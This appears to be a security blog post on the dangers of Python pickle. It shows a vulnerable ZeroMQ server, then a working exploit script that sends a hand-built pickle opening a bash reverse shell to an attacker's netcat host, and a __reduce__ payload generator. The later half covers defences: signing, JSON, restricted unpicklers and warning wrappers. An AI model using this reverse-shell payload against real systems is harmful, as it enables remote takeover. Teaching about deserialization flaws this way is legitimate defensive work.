Reading about the latest vulnerabilities in Rails got me thinking about a similar issue we have in Python.
It is well known that using pickle on untrusted data is insecure to the point of allowing arbitrary code execution. Or at least it should be.
If we head to the official documentation for pickle we’ll find this warning:
Warning: The pickle module is not intended to be secure against erroneous or maliciously constructed data. Never unpickle data received from an untrusted or unauthenticated source.
Now, how many of us check the official pickle documentation (or the official docs for any other module) every time we’re going to use it? Even if we’ve read that warning before, it’s easy to forget it and mistake pickle for just another serialization format (especially when solving a problem for which pickle is just a tool). We might even be using someone else’s code that unpickles untrusted data.
Pickle as a vulnerability
As a sanity check, to see if I was being paranoid, I went over to GitHub and ran a search for “pickle.loads”, which led to 36,375 results. After that, it took about 10 minutes to find a vulnerable project and exploit the vulnerability (actual code used by companies, not just some learn_pickle_test.py). I also found many “potentially vulnerable” projects, but didn’t take the time to try to demonstrate the issue on each of them.
Exploiting the vulnerability
The vulnerable code looks something like this:
import zmq
import cPickle as pickle


class Server(object):
    def __init__(self):
        context = zmq.Context()
        # Both sockets listen on every network interface
        self.receiver = context.socket(zmq.PULL)
        self.receiver.bind("tcp://*:1234")
        self.sender = context.socket(zmq.PUSH)
        self.sender.bind("tcp://*:1235")

    def send(self, data):
        self.sender.send(pickle.dumps(data))

    def recv(self):
        data = self.receiver.recv()
        # Vulnerable: unpickles whatever bytes arrive on the socket
        return pickle.loads(data)


server = Server()
server.recv()
Exploiting it is a matter of running
nc -l -p 9000
on an accessible server and running:
import zmq


def main():
    server_host = '98.76.54.32'
    netcat_host = '12.34.56.78'

    context = zmq.Context()
    zmq_socket = context.socket(zmq.PUSH)
    zmq_socket.connect('tcp://%s:1234' % server_host)

    # Hand-written pickle that calls posix.system() with a reverse shell command
    shellcode = "cposix\nsystem\np0\n(S'/bin/bash -i >& /dev/tcp/%s/9000 0>&1'\np1\ntp2\nRp3\n." % netcat_host
    zmq_socket.send(shellcode)
    # we get a reverse shell on the netcat host


if __name__ == "__main__":
    main()
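The shellcode itself can be generated by pickling an object that defines __reduce__:
import os
import cPickle


# Exploit that we want the target to unpickle
class Exploit(object):
    def __reduce__(self):
        # Tells pickle to call os.system('ls') when the data is loaded
        return (os.system, ('ls',))


shellcode = cPickle.dumps(Exploit())
print shellcode
The payload comes from the object's __reduce__ method: pickle stores the callable and arguments it returns, and calls them when the data is unpickled.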
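To see the mechanism without running a shell command, here is a harmless sketch written for Python 3's pickle module (the code above is Python 2). The class name Harmless is made up for illustration, and len() stands in for os.system():

```python
import pickle


class Harmless(object):
    """Stand-in for the exploit class; it calls len() instead of os.system()."""

    def __reduce__(self):
        # pickle records "call len with these arguments" in the payload
        return (len, ("pickle",))


payload = pickle.dumps(Harmless())

# Loading the payload does not rebuild a Harmless instance;
# it calls len("pickle") and hands back whatever that call returns.
result = pickle.loads(payload)
print(result)
```

The loaded value is the return value of the call, not an instance of the class, which is why swapping len for os.system turns loading into command execution.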
Protecting ourselves
Only unpickle stuff you pickled yourself
This is harder than it sounds. Initially we could trust things that come from our own server (i.e. if it’s in the DB, redis, the cache, etc., then I can trust it), but if someone has access to manipulate them, then they can also exploit this vulnerability. An example would be getting the server above to only accept connections from localhost, but running it on shared hosting.
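One way to check that a pickle really is one we produced is to sign it and verify the signature before loading. The following is a minimal Python 3 sketch, not a complete solution: SECRET_KEY, signed_dumps and signed_loads are hypothetical names, and it assumes the key is kept somewhere an attacker cannot read.

```python
import hashlib
import hmac
import pickle

# Hypothetical key; in practice it would come from protected configuration
SECRET_KEY = b"replace-with-a-real-secret"
DIGEST_SIZE = hashlib.sha256().digest_size  # length of a SHA-256 digest in bytes


def signed_dumps(obj, key=SECRET_KEY):
    """Pickle obj and prepend an HMAC-SHA256 signature of the pickle."""
    payload = pickle.dumps(obj)
    signature = hmac.new(key, payload, hashlib.sha256).digest()
    return signature + payload


def signed_loads(blob, key=SECRET_KEY):
    """Verify the signature first; only unpickle when it matches."""
    signature, payload = blob[:DIGEST_SIZE], blob[DIGEST_SIZE:]
    expected = hmac.new(key, payload, hashlib.sha256).digest()
    if not hmac.compare_digest(signature, expected):
        raise ValueError("signature mismatch; refusing to unpickle")
    return pickle.loads(payload)
```

This only moves the trust to the key: anyone who can read it can still craft a payload that passes the check.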
Just avoid pickle
The easiest way of protecting ourselves is to not use pickle unless it’s actually necessary, and to check our dependencies to see if they are vulnerable to these (and other) attacks. If all we need is a serialization format for data, JSON is probably enough.
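As a rough Python 3 sketch of what that swap could look like for simple messages (encode_message, decode_message and the message fields are invented for illustration):

```python
import json


def encode_message(message):
    """Serialize plain data (dicts, lists, strings, numbers) to bytes."""
    return json.dumps(message).encode("utf-8")


def decode_message(data):
    """Parse bytes back into plain data; JSON cannot trigger function calls."""
    return json.loads(data.decode("utf-8"))


wire = encode_message({"job_id": 42, "args": ["a", "b"], "retry": True})
received = decode_message(wire)

# A pickle payload like the one in the exploit is not valid JSON,
# so it is rejected instead of being executed.
malicious = b"cposix\nsystem\np0\n(S'ls'\np1\ntp2\nRp3\n."
try:
    decode_message(malicious)
    rejected = False
except ValueError:
    rejected = True
```

The trade-off is that JSON only carries basic types, so custom objects have to be converted to and from dicts by hand.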
Don’t trust anyone
This is just another case of attackers using unvalidated data to break into our system. As with any user-submitted data, we need to somehow make sure that it is not being spoofed and/or that our code can handle malicious data gracefully (also harder than it sounds).
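If pickle has to stay, one way to handle malicious data more gracefully is to restrict which globals the unpickler may look up, by overriding Unpickler.find_class as the Python 3 pickle documentation describes. This is a sketch under that assumption; the whitelist contents and the names RestrictedUnpickler and restricted_loads are illustrative, and it narrows the attack surface rather than making pickle safe.

```python
import builtins
import io
import pickle

# Illustrative whitelist: the only globals a payload is allowed to reference
SAFE_BUILTINS = {"range", "complex", "set", "frozenset", "slice"}


class RestrictedUnpickler(pickle.Unpickler):
    def find_class(self, module, name):
        # Called whenever the pickle asks for a global such as os.system
        if module == "builtins" and name in SAFE_BUILTINS:
            return getattr(builtins, name)
        raise pickle.UnpicklingError(
            "global '%s.%s' is forbidden" % (module, name))


def restricted_loads(data):
    """Like pickle.loads(), but refuses any global outside the whitelist."""
    return RestrictedUnpickler(io.BytesIO(data)).load()
```

Plain containers and whitelisted types still load, while a payload that references os.system raises pickle.UnpicklingError before anything is called.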
Better interfaces
The best way to avoid seeing any vulnerability in the wild is to educate ourselves to know when a piece of code is vulnerable. As API developers, a way of doing this is making sure that unsafe actions raise the necessary warnings or are self-documenting. In the case of pickle I’d like to see:
>>> with insecure_deserialization:
...     pickle.loads(x)
{}
# or
>>> pickle.loads(s)
SecurityWarning: Never unpickle data received from an untrusted or unauthenticated source.
{}
# or
>>> pickle.load_trusted_string(s)
{}
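Until something like that exists in pickle itself, a project could approximate the last two ideas with thin wrappers of its own. The sketch below is Python 3 and entirely hypothetical: SecurityWarning, noisy_loads and load_trusted_string are not part of the standard library.

```python
import pickle
import warnings


class SecurityWarning(UserWarning):
    """Hypothetical warning category; not part of the standard library."""


def noisy_loads(data):
    """Unpickle data, but warn the caller on every use."""
    warnings.warn(
        "Never unpickle data received from an untrusted or "
        "unauthenticated source.",
        SecurityWarning,
        stacklevel=2,  # point the warning at the caller, not this wrapper
    )
    return pickle.loads(data)


def load_trusted_string(data):
    """Same behaviour as pickle.loads(); the name documents the assumption."""
    return pickle.loads(data)
```

Neither wrapper adds any protection; the point is only that the call site now says out loud what it is assuming about the data.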